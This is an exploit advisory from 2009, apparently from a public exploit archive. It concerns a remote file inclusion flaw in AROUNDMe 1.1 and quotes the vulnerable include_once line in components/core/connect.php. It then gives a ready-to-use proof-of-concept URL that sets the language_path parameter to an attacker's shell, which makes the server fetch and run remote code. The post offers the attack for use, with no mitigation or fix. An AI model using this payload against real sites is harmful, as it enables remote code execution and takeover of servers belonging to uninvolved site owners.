[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AROUNDMe <= 1.1 (language_path) Remote File Include Exploit
# Published : 2009-12-06
# Author : cr4wl3r
# Previous Title : MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities
# Next Title : elkagroup SQL Injection Vulnerability
[ Discovered by cr4wl3r Indonesian Hacker ]
########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)
<?php
include_once($language_path . 'connect.lang.php');
?>
########################################################################
########################################################################
PoC : http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################
########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################
[ Gorontalo / 2009 ]